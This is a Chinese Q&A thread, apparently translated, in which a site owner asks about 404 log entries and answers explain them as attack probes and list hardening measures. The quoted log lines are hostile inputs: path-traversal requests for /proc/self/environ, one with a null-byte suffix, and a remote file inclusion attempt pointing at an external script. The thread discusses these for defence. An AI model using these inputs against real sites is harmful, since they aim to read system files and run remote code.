查看我的 404 日志,我注意到以下两个 URL 都出现过一次:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
和
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
有问题的页面library.php需要一个type具有六个不同可接受值的变量,然后是一个id变量。因此,有效的 URL 可能是
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
mysql_real_escape_string并且在用于查询数据库之前所有 ID 都会被运行一遍。
我是新手,但在我看来,这两个链接都是针对 webroot 的简单攻击?
1)除了 404 之外,如何最好地防止这些事情发生?
2)我是否应该永久禁止负责的 IP?
编辑:也刚刚注意到这个
/library.php=http://www.basfalt.no/scripts/danger.txt
编辑2:这 3 次攻击的攻击 IP 均可以216.97.231.15追溯到位于洛杉矶郊外的一家名为 Lunar Pages 的 ISP。
编辑3:我决定在当地时间周五早上给 ISP 打电话,与能接通电话的任何人讨论这个问题。我会在 24 小时左右在这里发布结果。
编辑4:我最终给他们的管理员发了一封电子邮件,他们首先回复说“他们正在调查此事”,然后一天后又回复说“这个问题现在应该解决了。”遗憾的是,没有进一步的细节。
答案1
0) 是的。至少,这是对你的网站进行的系统探测,试图发现它是否存在漏洞。
1) 除了确保代码干净之外,您能做的不多,只能对主机运行自己的测试以确保其安全。Google Skipfish 是众多可帮助您的工具之一。
2)我愿意。
答案2
这是一次攻击,这很好解释这里。
答案3
正如其他人所说:是的,这是一次黑客攻击。请注意,除了这种可能的人为攻击之外,僵尸网络还运行着大量自动攻击。通常,这些攻击试图利用古老的漏洞和/或一些典型的编码缺陷,例如无法验证用户输入导致 SQL 注入、系统或文件泄漏等。
手动禁止这些僵尸网络很可能是不可能的,因为僵尸网络可以使用多达数千个唯一的 IP 地址,所以如果您想禁止它们,您将不得不使用某种自动禁止程序。失败2ban我想到的是;让它对 mod_security 事件或一些其他日志条目做出反应。
如果您的代码干净且服务器经过强化,那么这些黑客攻击只会造成令人讨厌的日志污染。但最好采取预防措施,并根据您的需要考虑以下部分或全部措施:
mod_security是一个 Apache 模块,用于过滤所有类型的典型黑客攻击。如果发现可疑的 JavaScript 等,它还可以限制出站流量(您的服务器将发送给客户端的页面)。
苏霍辛用于强化 PHP 本身。
将您的 webroot 和 PHP 临时目录挂载为noexec,nosuid,nodev。
禁用不需要的 PHP 函数,例如系统和直通。
禁用不需要的 PHP 模块。例如,如果您不需要 IMAP 支持,请不要启用它。
保持你的服务器为最新状态。
留意日志。
确保您有备份。
制定一个计划,以防有人攻击您或遇到其他灾难时该怎么做。
答案4
正如已经说过的 - 这是尝试访问 /proc/self/environ 文件以获取更多信息。
我假设它是一台 Linux 机器:
你应该使用
- 苏霍辛(http://www.hardened-php.net/suhosin/) - 保护 php 脚本
- 使用 php openbasedir 限制
- 失败2banhttp://www.fail2ban.org/
你可以阻止攻击服务器的 IP,但你应该考虑到它在功能上可能不具有攻击性。
当我的服务器受到攻击时,我曾经阻止一些服务:http / https / pop / imap / ssh但保持 smtp 开放,这样如果您犯了错误,您就可以收到通知。